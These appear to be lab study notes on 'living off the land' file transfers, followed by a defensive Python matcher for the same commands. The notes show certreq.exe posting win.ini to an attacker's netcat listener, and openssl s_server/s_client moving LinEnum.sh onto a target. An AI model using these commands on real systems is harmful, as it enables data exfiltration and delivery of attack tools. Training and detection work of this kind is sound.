Living off the Land

There are currently two websites that aggregate information on Living off the Land binaries:

LOLBAS

We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.

Upload win.ini to our Attackbox

C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

And in our netcat session ->

ElFelixi0@htb[/htb]$ sudo nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819
POST / HTTP/1.1
Cache-Control: no-cache
<SNIP>

If we get an error, the version of certreq.exe we are using may not support the -Post parameter. We can download an updated version here and try again.

GTFOBins

We need to create a certificate and start a server in our Pwnbox.

Cert ->

ElFelixi0@htb[/htb]$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Server up ->

ElFelixi0@htb[/htb]$ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

Now, from the target machine, we need to download the file ->

ElFelixi0@htb[/htb]$ openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
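From the defender's side, both transfers above are visible in process-creation telemetry. The following is an added example, not part of the original notes: a small Python matcher for the certreq.exe and openssl command lines shown on this page. The host names, rule names and sample events are constructed assumptions.

```python
import ntpath
import re

# Constructed sample process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r"certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini"),
    ("WS01", r"certreq.exe -new request.inf request.csr"),
    ("lnx01", "openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem"),
    ("lnx02", "openssl s_client -connect 10.10.10.32:80 -quiet"),
    ("lnx02", "openssl x509 -in certificate.pem -noout -text"),
]

URL_RE = re.compile(r"^https?://([^/\s]+)", re.I)


def arg_after(tokens, flag):
    """Return the token that follows `flag` (case-insensitive), or None."""
    lowered = [t.lower() for t in tokens]
    if flag in lowered[:-1]:
        return tokens[lowered.index(flag) + 1]
    return None


def classify(cmdline):
    """Return (rule, remote_endpoint) for a matching command line, else None."""
    tokens = cmdline.split()
    if not tokens:
        return None
    # Normalise the image name: drop any directory and extension, ignore case.
    image = ntpath.splitext(ntpath.basename(tokens[0]))[0].lower()
    flags = {t.lower() for t in tokens[1:]}
    # certreq.exe sending data with -Post to an HTTP(S) URL given via -config.
    if image == "certreq" and "-post" in flags:
        m = URL_RE.match(arg_after(tokens, "-config") or "")
        if m:
            return ("certreq_http_post", m.group(1))
    # Shell redirection (< file, > file) never reaches argv, so the rule keys
    # on the openssl subcommand and its -connect / -accept argument instead.
    if image == "openssl" and len(tokens) > 1:
        sub = tokens[1].lower()
        if sub == "s_client":
            return ("openssl_s_client", arg_after(tokens, "-connect"))
        if sub == "s_server":
            return ("openssl_s_server", arg_after(tokens, "-accept"))
    return None


def scan(events):
    """Return (host, rule, endpoint) for every event that matches a rule."""
    return [(host, *hit) for host, cmd in events if (hit := classify(cmd))]
```

The openssl rules also match routine TLS troubleshooting, so treat hits as hunting leads and correlate them with the remote endpoint and the parent process.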
